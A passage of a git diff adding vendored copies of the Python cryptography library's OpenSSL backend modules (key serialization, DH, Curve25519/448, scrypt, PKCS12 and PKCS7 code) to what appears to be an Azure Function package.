self._lib.PEM_write_bio_RSAPublicKey + elif encoding is serialization.Encoding.DER: + write_bio = self._lib.i2d_RSAPublicKey_bio + else: + raise ValueError("PKCS1 works only with PEM or DER encoding") + return self._bio_func_output(write_bio, cdata) + + # OpenSSH + OpenSSH + if format is serialization.PublicFormat.OpenSSH: + if encoding is serialization.Encoding.OpenSSH: + return ssh.serialize_ssh_public_key(key) + + raise ValueError( + "OpenSSH format must be used with OpenSSH encoding" + ) + + # Anything that key-specific code was supposed to handle earlier, + # like Raw, CompressedPoint, UncompressedPoint + raise ValueError("format is invalid with this key") + + def dh_supported(self) -> bool: + return not self._lib.CRYPTOGRAPHY_IS_BORINGSSL + + def generate_dh_parameters( + self, generator: int, key_size: int + ) -> dh.DHParameters: + if key_size < dh._MIN_MODULUS_SIZE: + raise ValueError( + "DH key_size must be at least {} bits".format( + dh._MIN_MODULUS_SIZE + ) + ) + + if generator not in (2, 5): + raise ValueError("DH generator must be 2 or 5") + + dh_param_cdata = self._lib.DH_new() + self.openssl_assert(dh_param_cdata != self._ffi.NULL) + dh_param_cdata = self._ffi.gc(dh_param_cdata, self._lib.DH_free) + + res = self._lib.DH_generate_parameters_ex( + dh_param_cdata, key_size, generator, self._ffi.NULL + ) + self.openssl_assert(res == 1) + + return _DHParameters(self, dh_param_cdata) + + def _dh_cdata_to_evp_pkey(self, dh_cdata): + evp_pkey = self._create_evp_pkey_gc() + res = self._lib.EVP_PKEY_set1_DH(evp_pkey, dh_cdata) + self.openssl_assert(res == 1) + return evp_pkey + + def generate_dh_private_key( + self, parameters: dh.DHParameters + ) -> dh.DHPrivateKey: + dh_key_cdata = _dh_params_dup( + parameters._dh_cdata, self # type: ignore[attr-defined] + ) + + res = self._lib.DH_generate_key(dh_key_cdata) + self.openssl_assert(res == 1) + + evp_pkey = self._dh_cdata_to_evp_pkey(dh_key_cdata) + + return _DHPrivateKey(self, dh_key_cdata, evp_pkey) + + def generate_dh_private_key_and_parameters( + self, generator: int, key_size: int + ) -> dh.DHPrivateKey: + return self.generate_dh_private_key( + self.generate_dh_parameters(generator, key_size) + ) + + def load_dh_private_numbers( + self, numbers: dh.DHPrivateNumbers + ) -> dh.DHPrivateKey: + parameter_numbers = numbers.public_numbers.parameter_numbers + + dh_cdata = self._lib.DH_new() + self.openssl_assert(dh_cdata != self._ffi.NULL) + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + + p = self._int_to_bn(parameter_numbers.p) + g = self._int_to_bn(parameter_numbers.g) + + if parameter_numbers.q is not None: + q = self._int_to_bn(parameter_numbers.q) + else: + q = self._ffi.NULL + + pub_key = self._int_to_bn(numbers.public_numbers.y) + priv_key = self._int_to_bn(numbers.x) + + res = self._lib.DH_set0_pqg(dh_cdata, p, q, g) + self.openssl_assert(res == 1) + + res = self._lib.DH_set0_key(dh_cdata, pub_key, priv_key) + self.openssl_assert(res == 1) + + codes = self._ffi.new("int[]", 1) + res = self._lib.Cryptography_DH_check(dh_cdata, codes) + self.openssl_assert(res == 1) + + # DH_check will return DH_NOT_SUITABLE_GENERATOR if p % 24 does not + # equal 11 when the generator is 2 (a quadratic nonresidue). + # We want to ignore that error because p % 24 == 23 is also fine. + # Specifically, g is then a quadratic residue. Within the context of + # Diffie-Hellman this means it can only generate half the possible + # values. That sounds bad, but quadratic nonresidues leak a bit of + # the key to the attacker in exchange for having the full key space + # available. See: https://crypto.stackexchange.com/questions/12961 + if codes[0] != 0 and not ( + parameter_numbers.g == 2 + and codes[0] ^ self._lib.DH_NOT_SUITABLE_GENERATOR == 0 + ): + raise ValueError("DH private numbers did not pass safety checks.") + + evp_pkey = self._dh_cdata_to_evp_pkey(dh_cdata) + + return _DHPrivateKey(self, dh_cdata, evp_pkey) + + def load_dh_public_numbers( + self, numbers: dh.DHPublicNumbers + ) -> dh.DHPublicKey: + dh_cdata = self._lib.DH_new() + self.openssl_assert(dh_cdata != self._ffi.NULL) + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + + parameter_numbers = numbers.parameter_numbers + + p = self._int_to_bn(parameter_numbers.p) + g = self._int_to_bn(parameter_numbers.g) + + if parameter_numbers.q is not None: + q = self._int_to_bn(parameter_numbers.q) + else: + q = self._ffi.NULL + + pub_key = self._int_to_bn(numbers.y) + + res = self._lib.DH_set0_pqg(dh_cdata, p, q, g) + self.openssl_assert(res == 1) + + res = self._lib.DH_set0_key(dh_cdata, pub_key, self._ffi.NULL) + self.openssl_assert(res == 1) + + evp_pkey = self._dh_cdata_to_evp_pkey(dh_cdata) + + return _DHPublicKey(self, dh_cdata, evp_pkey) + + def load_dh_parameter_numbers( + self, numbers: dh.DHParameterNumbers + ) -> dh.DHParameters: + dh_cdata = self._lib.DH_new() + self.openssl_assert(dh_cdata != self._ffi.NULL) + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + + p = self._int_to_bn(numbers.p) + g = self._int_to_bn(numbers.g) + + if numbers.q is not None: + q = self._int_to_bn(numbers.q) + else: + q = self._ffi.NULL + + res = self._lib.DH_set0_pqg(dh_cdata, p, q, g) + self.openssl_assert(res == 1) + + return _DHParameters(self, dh_cdata) + + def dh_parameters_supported( + self, p: int, g: int, q: typing.Optional[int] = None + ) -> bool: + dh_cdata = self._lib.DH_new() + self.openssl_assert(dh_cdata != self._ffi.NULL) + dh_cdata = self._ffi.gc(dh_cdata, self._lib.DH_free) + + p = self._int_to_bn(p) + g = self._int_to_bn(g) + + if q is not None: + q = self._int_to_bn(q) + else: + q = self._ffi.NULL + + res = self._lib.DH_set0_pqg(dh_cdata, p, q, g) + self.openssl_assert(res == 1) + + codes = self._ffi.new("int[]", 1) + res = self._lib.Cryptography_DH_check(dh_cdata, codes) + self.openssl_assert(res == 1) + + return codes[0] == 0 + + def dh_x942_serialization_supported(self) -> bool: + return self._lib.Cryptography_HAS_EVP_PKEY_DHX == 1 + + def x25519_load_public_bytes(self, data: bytes) -> x25519.X25519PublicKey: + # When we drop support for CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 we can + # switch this to EVP_PKEY_new_raw_public_key + if len(data) != 32: + raise ValueError("An X25519 public key is 32 bytes long") + + evp_pkey = self._create_evp_pkey_gc() + res = self._lib.EVP_PKEY_set_type(evp_pkey, self._lib.NID_X25519) + self.openssl_assert(res == 1) + res = self._lib.EVP_PKEY_set1_tls_encodedpoint( + evp_pkey, data, len(data) + ) + self.openssl_assert(res == 1) + return _X25519PublicKey(self, evp_pkey) + + def x25519_load_private_bytes( + self, data: bytes + ) -> x25519.X25519PrivateKey: + # When we drop support for CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 we can + # switch this to EVP_PKEY_new_raw_private_key and drop the + # zeroed_bytearray garbage. + # OpenSSL only has facilities for loading PKCS8 formatted private + # keys using the algorithm identifiers specified in + # https://tools.ietf.org/html/draft-ietf-curdle-pkix-09. + # This is the standard PKCS8 prefix for a 32 byte X25519 key. + # The form is: + # 0:d=0 hl=2 l= 46 cons: SEQUENCE + # 2:d=1 hl=2 l= 1 prim: INTEGER :00 + # 5:d=1 hl=2 l= 5 cons: SEQUENCE + # 7:d=2 hl=2 l= 3 prim: OBJECT :1.3.101.110 + # 12:d=1 hl=2 l= 34 prim: OCTET STRING (the key) + # Of course there's a bit more complexity. In reality OCTET STRING + # contains an OCTET STRING of length 32! So the last two bytes here + # are \x04\x20, which is an OCTET STRING of length 32. + if len(data) != 32: + raise ValueError("An X25519 private key is 32 bytes long") + + pkcs8_prefix = b'0.\x02\x01\x000\x05\x06\x03+en\x04"\x04 ' + with self._zeroed_bytearray(48) as ba: + ba[0:16] = pkcs8_prefix + ba[16:] = data + bio = self._bytes_to_bio(ba) + evp_pkey = self._lib.d2i_PrivateKey_bio(bio.bio, self._ffi.NULL) + + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + self.openssl_assert( + self._lib.EVP_PKEY_id(evp_pkey) == self._lib.EVP_PKEY_X25519 + ) + return _X25519PrivateKey(self, evp_pkey) + + def _evp_pkey_keygen_gc(self, nid): + evp_pkey_ctx = self._lib.EVP_PKEY_CTX_new_id(nid, self._ffi.NULL) + self.openssl_assert(evp_pkey_ctx != self._ffi.NULL) + evp_pkey_ctx = self._ffi.gc(evp_pkey_ctx, self._lib.EVP_PKEY_CTX_free) + res = self._lib.EVP_PKEY_keygen_init(evp_pkey_ctx) + self.openssl_assert(res == 1) + evp_ppkey = self._ffi.new("EVP_PKEY **") + res = self._lib.EVP_PKEY_keygen(evp_pkey_ctx, evp_ppkey) + self.openssl_assert(res == 1) + self.openssl_assert(evp_ppkey[0] != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_ppkey[0], self._lib.EVP_PKEY_free) + return evp_pkey + + def x25519_generate_key(self) -> x25519.X25519PrivateKey: + evp_pkey = self._evp_pkey_keygen_gc(self._lib.NID_X25519) + return _X25519PrivateKey(self, evp_pkey) + + def x25519_supported(self) -> bool: + if self._fips_enabled: + return False + return not self._lib.CRYPTOGRAPHY_IS_LIBRESSL + + def x448_load_public_bytes(self, data: bytes) -> x448.X448PublicKey: + if len(data) != 56: + raise ValueError("An X448 public key is 56 bytes long") + + evp_pkey = self._lib.EVP_PKEY_new_raw_public_key( + self._lib.NID_X448, self._ffi.NULL, data, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + return _X448PublicKey(self, evp_pkey) + + def x448_load_private_bytes(self, data: bytes) -> x448.X448PrivateKey: + if len(data) != 56: + raise ValueError("An X448 private key is 56 bytes long") + + data_ptr = self._ffi.from_buffer(data) + evp_pkey = self._lib.EVP_PKEY_new_raw_private_key( + self._lib.NID_X448, self._ffi.NULL, data_ptr, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + return _X448PrivateKey(self, evp_pkey) + + def x448_generate_key(self) -> x448.X448PrivateKey: + evp_pkey = self._evp_pkey_keygen_gc(self._lib.NID_X448) + return _X448PrivateKey(self, evp_pkey) + + def x448_supported(self) -> bool: + if self._fips_enabled: + return False + return ( + not self._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_111 + and not self._lib.CRYPTOGRAPHY_IS_BORINGSSL + ) + + def ed25519_supported(self) -> bool: + if self._fips_enabled: + return False + return not self._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_111B + + def ed25519_load_public_bytes( + self, data: bytes + ) -> ed25519.Ed25519PublicKey: + utils._check_bytes("data", data) + + if len(data) != ed25519._ED25519_KEY_SIZE: + raise ValueError("An Ed25519 public key is 32 bytes long") + + evp_pkey = self._lib.EVP_PKEY_new_raw_public_key( + self._lib.NID_ED25519, self._ffi.NULL, data, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + + return _Ed25519PublicKey(self, evp_pkey) + + def ed25519_load_private_bytes( + self, data: bytes + ) -> ed25519.Ed25519PrivateKey: + if len(data) != ed25519._ED25519_KEY_SIZE: + raise ValueError("An Ed25519 private key is 32 bytes long") + + utils._check_byteslike("data", data) + data_ptr = self._ffi.from_buffer(data) + evp_pkey = self._lib.EVP_PKEY_new_raw_private_key( + self._lib.NID_ED25519, self._ffi.NULL, data_ptr, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + + return _Ed25519PrivateKey(self, evp_pkey) + + def ed25519_generate_key(self) -> ed25519.Ed25519PrivateKey: + evp_pkey = self._evp_pkey_keygen_gc(self._lib.NID_ED25519) + return _Ed25519PrivateKey(self, evp_pkey) + + def ed448_supported(self) -> bool: + if self._fips_enabled: + return False + return ( + not self._lib.CRYPTOGRAPHY_OPENSSL_LESS_THAN_111B + and not self._lib.CRYPTOGRAPHY_IS_BORINGSSL + ) + + def ed448_load_public_bytes(self, data: bytes) -> ed448.Ed448PublicKey: + utils._check_bytes("data", data) + if len(data) != _ED448_KEY_SIZE: + raise ValueError("An Ed448 public key is 57 bytes long") + + evp_pkey = self._lib.EVP_PKEY_new_raw_public_key( + self._lib.NID_ED448, self._ffi.NULL, data, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + + return _Ed448PublicKey(self, evp_pkey) + + def ed448_load_private_bytes(self, data: bytes) -> ed448.Ed448PrivateKey: + utils._check_byteslike("data", data) + if len(data) != _ED448_KEY_SIZE: + raise ValueError("An Ed448 private key is 57 bytes long") + + data_ptr = self._ffi.from_buffer(data) + evp_pkey = self._lib.EVP_PKEY_new_raw_private_key( + self._lib.NID_ED448, self._ffi.NULL, data_ptr, len(data) + ) + self.openssl_assert(evp_pkey != self._ffi.NULL) + evp_pkey = self._ffi.gc(evp_pkey, self._lib.EVP_PKEY_free) + + return _Ed448PrivateKey(self, evp_pkey) + + def ed448_generate_key(self) -> ed448.Ed448PrivateKey: + evp_pkey = self._evp_pkey_keygen_gc(self._lib.NID_ED448) + return _Ed448PrivateKey(self, evp_pkey) + + def derive_scrypt( + self, + key_material: bytes, + salt: bytes, + length: int, + n: int, + r: int, + p: int, + ) -> bytes: + buf = self._ffi.new("unsigned char[]", length) + key_material_ptr = self._ffi.from_buffer(key_material) + res = self._lib.EVP_PBE_scrypt( + key_material_ptr, + len(key_material), + salt, + len(salt), + n, + r, + p, + scrypt._MEM_LIMIT, + buf, + length, + ) + if res != 1: + errors = self._consume_errors_with_text() + # memory required formula explained here: + # https://blog.filippo.io/the-scrypt-parameters/ + min_memory = 128 * n * r // (1024**2) + raise MemoryError( + "Not enough memory to derive key. These parameters require" + " {} MB of memory.".format(min_memory), + errors, + ) + return self._ffi.buffer(buf)[:] + + def aead_cipher_supported(self, cipher) -> bool: + cipher_name = aead._aead_cipher_name(cipher) + if self._fips_enabled and cipher_name not in self._fips_aead: + return False + # SIV isn't loaded through get_cipherbyname but instead a new fetch API + # only available in 3.0+. But if we know we're on 3.0+ then we know + # it's supported. + if cipher_name.endswith(b"-siv"): + return self._lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER == 1 + else: + return ( + self._lib.EVP_get_cipherbyname(cipher_name) != self._ffi.NULL + ) + + @contextlib.contextmanager + def _zeroed_bytearray(self, length: int) -> typing.Iterator[bytearray]: + """ + This method creates a bytearray, which we copy data into (hopefully + also from a mutable buffer that can be dynamically erased!), and then + zero when we're done. + """ + ba = bytearray(length) + try: + yield ba + finally: + self._zero_data(ba, length) + + def _zero_data(self, data, length: int) -> None: + # We clear things this way because at the moment we're not + # sure of a better way that can guarantee it overwrites the + # memory of a bytearray and doesn't just replace the underlying char *. + for i in range(length): + data[i] = 0 + + @contextlib.contextmanager + def _zeroed_null_terminated_buf(self, data): + """ + This method takes bytes, which can be a bytestring or a mutable + buffer like a bytearray, and yields a null-terminated version of that + data. This is required because PKCS12_parse doesn't take a length with + its password char * and ffi.from_buffer doesn't provide null + termination. So, to support zeroing the data via bytearray we + need to build this ridiculous construct that copies the memory, but + zeroes it after use. + """ + if data is None: + yield self._ffi.NULL + else: + data_len = len(data) + buf = self._ffi.new("char[]", data_len + 1) + self._ffi.memmove(buf, data, data_len) + try: + yield buf + finally: + # Cast to a uint8_t * so we can assign by integer + self._zero_data(self._ffi.cast("uint8_t *", buf), data_len) + + def load_key_and_certificates_from_pkcs12( + self, data: bytes, password: typing.Optional[bytes] + ) -> typing.Tuple[ + typing.Optional[PRIVATE_KEY_TYPES], + typing.Optional[x509.Certificate], + typing.List[x509.Certificate], + ]: + pkcs12 = self.load_pkcs12(data, password) + return ( + pkcs12.key, + pkcs12.cert.certificate if pkcs12.cert else None, + [cert.certificate for cert in pkcs12.additional_certs], + ) + + def load_pkcs12( + self, data: bytes, password: typing.Optional[bytes] + ) -> PKCS12KeyAndCertificates: + if password is not None: + utils._check_byteslike("password", password) + + bio = self._bytes_to_bio(data) + p12 = self._lib.d2i_PKCS12_bio(bio.bio, self._ffi.NULL) + if p12 == self._ffi.NULL: + self._consume_errors() + raise ValueError("Could not deserialize PKCS12 data") + + p12 = self._ffi.gc(p12, self._lib.PKCS12_free) + evp_pkey_ptr = self._ffi.new("EVP_PKEY **") + x509_ptr = self._ffi.new("X509 **") + sk_x509_ptr = self._ffi.new("Cryptography_STACK_OF_X509 **") + with self._zeroed_null_terminated_buf(password) as password_buf: + res = self._lib.PKCS12_parse( + p12, password_buf, evp_pkey_ptr, x509_ptr, sk_x509_ptr + ) + + # Workaround for + # https://github.com/libressl-portable/portable/issues/659 + if self._lib.CRYPTOGRAPHY_LIBRESSL_LESS_THAN_340: + self._consume_errors() + + if res == 0: + self._consume_errors() + raise ValueError("Invalid password or PKCS12 data") + + cert = None + key = None + additional_certificates = [] + + if evp_pkey_ptr[0] != self._ffi.NULL: + evp_pkey = self._ffi.gc(evp_pkey_ptr[0], self._lib.EVP_PKEY_free) + key = self._evp_pkey_to_private_key(evp_pkey) + + if x509_ptr[0] != self._ffi.NULL: + x509 = self._ffi.gc(x509_ptr[0], self._lib.X509_free) + cert_obj = self._ossl2cert(x509) + name = None + maybe_name = self._lib.X509_alias_get0(x509, self._ffi.NULL) + if maybe_name != self._ffi.NULL: + name = self._ffi.string(maybe_name) + cert = PKCS12Certificate(cert_obj, name) + + if sk_x509_ptr[0] != self._ffi.NULL: + sk_x509 = self._ffi.gc(sk_x509_ptr[0], self._lib.sk_X509_free) + num = self._lib.sk_X509_num(sk_x509_ptr[0]) + + # In OpenSSL < 3.0.0 PKCS12 parsing reverses the order of the + # certificates. + indices: typing.Iterable[int] + if ( + self._lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER + or self._lib.CRYPTOGRAPHY_IS_BORINGSSL + ): + indices = range(num) + else: + indices = reversed(range(num)) + + for i in indices: + x509 = self._lib.sk_X509_value(sk_x509, i) + self.openssl_assert(x509 != self._ffi.NULL) + x509 = self._ffi.gc(x509, self._lib.X509_free) + addl_cert = self._ossl2cert(x509) + addl_name = None + maybe_name = self._lib.X509_alias_get0(x509, self._ffi.NULL) + if maybe_name != self._ffi.NULL: + addl_name = self._ffi.string(maybe_name) + additional_certificates.append( + PKCS12Certificate(addl_cert, addl_name) + ) + + return PKCS12KeyAndCertificates(key, cert, additional_certificates) + + def serialize_key_and_certificates_to_pkcs12( + self, + name: typing.Optional[bytes], + key: typing.Optional[_ALLOWED_PKCS12_TYPES], + cert: typing.Optional[x509.Certificate], + cas: typing.Optional[typing.List[_PKCS12_CAS_TYPES]], + encryption_algorithm: serialization.KeySerializationEncryption, + ) -> bytes: + password = None + if name is not None: + utils._check_bytes("name", name) + + if isinstance(encryption_algorithm, serialization.NoEncryption): + nid_cert = -1 + nid_key = -1 + pkcs12_iter = 0 + mac_iter = 0 + elif isinstance( + encryption_algorithm, serialization.BestAvailableEncryption + ): + # PKCS12 encryption is hopeless trash and can never be fixed. + # This is the least terrible option. + nid_cert = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC + nid_key = self._lib.NID_pbe_WithSHA1And3_Key_TripleDES_CBC + # At least we can set this higher than OpenSSL's default + pkcs12_iter = 20000 + # mac_iter chosen for compatibility reasons, see: + # https://www.openssl.org/docs/man1.1.1/man3/PKCS12_create.html + # Did we mention how lousy PKCS12 encryption is? + mac_iter = 1 + password = encryption_algorithm.password + else: + raise ValueError("Unsupported key encryption type") + + if cas is None or len(cas) == 0: + sk_x509 = self._ffi.NULL + else: + sk_x509 = self._lib.sk_X509_new_null() + sk_x509 = self._ffi.gc(sk_x509, self._lib.sk_X509_free) + + # This list is to keep the x509 values alive until end of function + ossl_cas = [] + for ca in cas: + if isinstance(ca, PKCS12Certificate): + ca_alias = ca.friendly_name + ossl_ca = self._cert2ossl(ca.certificate) + with self._zeroed_null_terminated_buf( + ca_alias + ) as ca_name_buf: + res = self._lib.X509_alias_set1( + ossl_ca, ca_name_buf, -1 + ) + self.openssl_assert(res == 1) + else: + ossl_ca = self._cert2ossl(ca) + ossl_cas.append(ossl_ca) + res = self._lib.sk_X509_push(sk_x509, ossl_ca) + backend.openssl_assert(res >= 1) + + with self._zeroed_null_terminated_buf(password) as password_buf: + with self._zeroed_null_terminated_buf(name) as name_buf: + ossl_cert = self._cert2ossl(cert) if cert else self._ffi.NULL + if key is not None: + evp_pkey = key._evp_pkey # type: ignore[union-attr] + else: + evp_pkey = self._ffi.NULL + + p12 = self._lib.PKCS12_create( + password_buf, + name_buf, + evp_pkey, + ossl_cert, + sk_x509, + nid_key, + nid_cert, + pkcs12_iter, + mac_iter, + 0, + ) + + self.openssl_assert(p12 != self._ffi.NULL) + p12 = self._ffi.gc(p12, self._lib.PKCS12_free) + + bio = self._create_mem_bio_gc() + res = self._lib.i2d_PKCS12_bio(bio, p12) + self.openssl_assert(res > 0) + return self._read_mem_bio(bio) + + def poly1305_supported(self) -> bool: + if self._fips_enabled: + return False + return self._lib.Cryptography_HAS_POLY1305 == 1 + + def create_poly1305_ctx(self, key: bytes) -> _Poly1305Context: + utils._check_byteslike("key", key) + if len(key) != _POLY1305_KEY_SIZE: + raise ValueError("A poly1305 key is 32 bytes long") + + return _Poly1305Context(self, key) + + def pkcs7_supported(self) -> bool: + return not self._lib.CRYPTOGRAPHY_IS_BORINGSSL + + def load_pem_pkcs7_certificates( + self, data: bytes + ) -> typing.List[x509.Certificate]: + utils._check_bytes("data", data) + bio = self._bytes_to_bio(data) + p7 = self._lib.PEM_read_bio_PKCS7( + bio.bio, self._ffi.NULL, self._ffi.NULL, self._ffi.NULL + ) + if p7 == self._ffi.NULL: + self._consume_errors() + raise ValueError("Unable to parse PKCS7 data") + + p7 = self._ffi.gc(p7, self._lib.PKCS7_free) + return self._load_pkcs7_certificates(p7) + + def load_der_pkcs7_certificates( + self, data: bytes + ) -> typing.List[x509.Certificate]: + utils._check_bytes("data", data) + bio = self._bytes_to_bio(data) + p7 = self._lib.d2i_PKCS7_bio(bio.bio, self._ffi.NULL) + if p7 == self._ffi.NULL: + self._consume_errors() + raise ValueError("Unable to parse PKCS7 data") + + p7 = self._ffi.gc(p7, self._lib.PKCS7_free) + return self._load_pkcs7_certificates(p7) + + def _load_pkcs7_certificates(self, p7): + nid = self._lib.OBJ_obj2nid(p7.type) + self.openssl_assert(nid != self._lib.NID_undef) + if nid != self._lib.NID_pkcs7_signed: + raise UnsupportedAlgorithm( + "Only basic signed structures are currently supported. NID" + " for this data was {}".format(nid), + _Reasons.UNSUPPORTED_SERIALIZATION, + ) + + sk_x509 = p7.d.sign.cert + num = self._lib.sk_X509_num(sk_x509) + certs = [] + for i in range(num): + x509 = self._lib.sk_X509_value(sk_x509, i) + self.openssl_assert(x509 != self._ffi.NULL) + res = self._lib.X509_up_ref(x509) + # When OpenSSL is less than 1.1.0 up_ref returns the current + # refcount. On 1.1.0+ it returns 1 for success. + self.openssl_assert(res >= 1) + x509 = self._ffi.gc(x509, self._lib.X509_free) + cert = self._ossl2cert(x509) + certs.append(cert) + + return certs + + def pkcs7_serialize_certificates( + self, + certs: typing.List[x509.Certificate], + encoding: serialization.Encoding, + ): + certs = list(certs) + if not certs or not all( + isinstance(cert, x509.Certificate) for cert in certs + ): + raise TypeError("certs must be a list of certs with length >= 1") + + if encoding not in ( + serialization.Encoding.PEM, + serialization.Encoding.DER, + ): + raise TypeError("encoding must DER or PEM from the Encoding enum") + + certs_sk = self._lib.sk_X509_new_null() + certs_sk = self._ffi.gc(certs_sk, self._lib.sk_X509_free) + # This list is to keep the x509 values alive until end of function + ossl_certs = [] + for cert in certs: + ossl_cert = self._cert2ossl(cert) + ossl_certs.append(ossl_cert) + res = self._lib.sk_X509_push(certs_sk, ossl_cert) + self.openssl_assert(res >= 1) + # We use PKCS7_sign here because it creates the PKCS7 and PKCS7_SIGNED + # structures for us rather than requiring manual assignment. + p7 = self._lib.PKCS7_sign( + self._ffi.NULL, + self._ffi.NULL, + certs_sk, + self._ffi.NULL, + self._lib.PKCS7_PARTIAL, + ) + bio_out = self._create_mem_bio_gc() + if encoding is serialization.Encoding.PEM: + res = self._lib.PEM_write_bio_PKCS7_stream( + bio_out, p7, self._ffi.NULL, 0 + ) + else: + assert encoding is serialization.Encoding.DER + res = self._lib.i2d_PKCS7_bio(bio_out, p7) + + self.openssl_assert(res == 1) + return self._read_mem_bio(bio_out) + + def pkcs7_sign( + self, + builder: pkcs7.PKCS7SignatureBuilder, + encoding: serialization.Encoding, + options: typing.List[pkcs7.PKCS7Options], + ) -> bytes: + assert builder._data is not None + bio = self._bytes_to_bio(builder._data) + init_flags = self._lib.PKCS7_PARTIAL + final_flags = 0 + + if len(builder._additional_certs) == 0: + certs = self._ffi.NULL + else: + certs = self._lib.sk_X509_new_null() + certs = self._ffi.gc(certs, self._lib.sk_X509_free) + # This list is to keep the x509 values alive until end of function + ossl_certs = [] + for cert in builder._additional_certs: + ossl_cert = self._cert2ossl(cert) + ossl_certs.append(ossl_cert) + res = self._lib.sk_X509_push(certs, ossl_cert) + self.openssl_assert(res >= 1) + + if pkcs7.PKCS7Options.DetachedSignature in options: + # Don't embed the data in the PKCS7 structure + init_flags |= self._lib.PKCS7_DETACHED + final_flags |= self._lib.PKCS7_DETACHED + + # This just inits a structure for us. However, there + # are flags we need to set, joy. + p7 = self._lib.PKCS7_sign( + self._ffi.NULL, + self._ffi.NULL, + certs, + self._ffi.NULL, + init_flags, + ) + self.openssl_assert(p7 != self._ffi.NULL) + p7 = self._ffi.gc(p7, self._lib.PKCS7_free) + signer_flags = 0 + # These flags are configurable on a per-signature basis + # but we've deliberately chosen to make the API only allow + # setting it across all signatures for now. + if pkcs7.PKCS7Options.NoCapabilities in options: + signer_flags |= self._lib.PKCS7_NOSMIMECAP + elif pkcs7.PKCS7Options.NoAttributes in options: + signer_flags |= self._lib.PKCS7_NOATTR + + if pkcs7.PKCS7Options.NoCerts in options: + signer_flags |= self._lib.PKCS7_NOCERTS + + for certificate, private_key, hash_algorithm in builder._signers: + ossl_cert = self._cert2ossl(certificate) + md = self._evp_md_non_null_from_algorithm(hash_algorithm) + p7signerinfo = self._lib.PKCS7_sign_add_signer( + p7, + ossl_cert, + private_key._evp_pkey, # type: ignore[union-attr] + md, + signer_flags, + ) + self.openssl_assert(p7signerinfo != self._ffi.NULL) + + for option in options: + # DetachedSignature, NoCapabilities, and NoAttributes are already + # handled so we just need to check these last two options. + if option is pkcs7.PKCS7Options.Text: + final_flags |= self._lib.PKCS7_TEXT + elif option is pkcs7.PKCS7Options.Binary: + final_flags |= self._lib.PKCS7_BINARY + + bio_out = self._create_mem_bio_gc() + if encoding is serialization.Encoding.SMIME: + # This finalizes the structure + res = self._lib.SMIME_write_PKCS7( + bio_out, p7, bio.bio, final_flags + ) + elif encoding is serialization.Encoding.PEM: + res = self._lib.PKCS7_final(p7, bio.bio, final_flags) + self.openssl_assert(res == 1) + res = self._lib.PEM_write_bio_PKCS7_stream( + bio_out, p7, bio.bio, final_flags + ) + else: + assert encoding is serialization.Encoding.DER + # We need to call finalize here becauase i2d_PKCS7_bio does not + # finalize. + res = self._lib.PKCS7_final(p7, bio.bio, final_flags) + self.openssl_assert(res == 1) + # OpenSSL 3.0 leaves a random bio error on the stack: + # https://github.com/openssl/openssl/issues/16681 + if self._lib.CRYPTOGRAPHY_OPENSSL_300_OR_GREATER: + self._consume_errors() + res = self._lib.i2d_PKCS7_bio(bio_out, p7) + self.openssl_assert(res == 1) + return self._read_mem_bio(bio_out) + + +class GetCipherByName: + def __init__(self, fmt: str): + self._fmt = fmt + + def __call__(self, backend: Backend, cipher: CipherAlgorithm, mode: Mode): + cipher_name = self._fmt.format(cipher=cipher, mode=mode).lower() + return backend._lib.EVP_get_cipherbyname(cipher_name.encode("ascii")) + + +def _get_xts_cipher(backend: Backend, cipher: AES, mode): + cipher_name = "aes-{}-xts".format(cipher.key_size // 2) + return backend._lib.EVP_get_cipherbyname(cipher_name.encode("ascii")) + + +backend = Backend() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ciphers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ciphers.py new file mode 100644 index 0000000..9cfecc2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/hazmat/backends/openssl/ciphers.py @@ -0,0 +1,282 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + +import typing + +from cryptography.exceptions import InvalidTag, UnsupportedAlgorithm, _Reasons +from cryptography.hazmat.primitives import ciphers +from cryptography.hazmat.primitives.ciphers import algorithms, modes + + +if typing.TYPE_CHECKING: + from cryptography.hazmat.backends.openssl.backend import Backend + + +class _CipherContext: + _ENCRYPT = 1 + _DECRYPT = 0 + _MAX_CHUNK_SIZE = 2**30 - 1 + + def __init__( + self, backend: "Backend", cipher, mode, operation: int + ) -> None: + self._backend = backend + self._cipher = cipher + self._mode = mode + self._operation = operation + self._tag: typing.Optional[bytes] = None + + if isinstance(self._cipher, ciphers.BlockCipherAlgorithm): + self._block_size_bytes = self._cipher.block_size // 8 + else: + self._block_size_bytes = 1 + + ctx = self._backend._lib.EVP_CIPHER_CTX_new() + ctx = self._backend._ffi.gc( + ctx, self._backend._lib.EVP_CIPHER_CTX_free + ) + + registry = self._backend._cipher_registry + try: + adapter = registry[type(cipher), type(mode)] + except KeyError: + raise UnsupportedAlgorithm( + "cipher {} in {} mode is not supported " + "by this backend.".format( + cipher.name, mode.name if 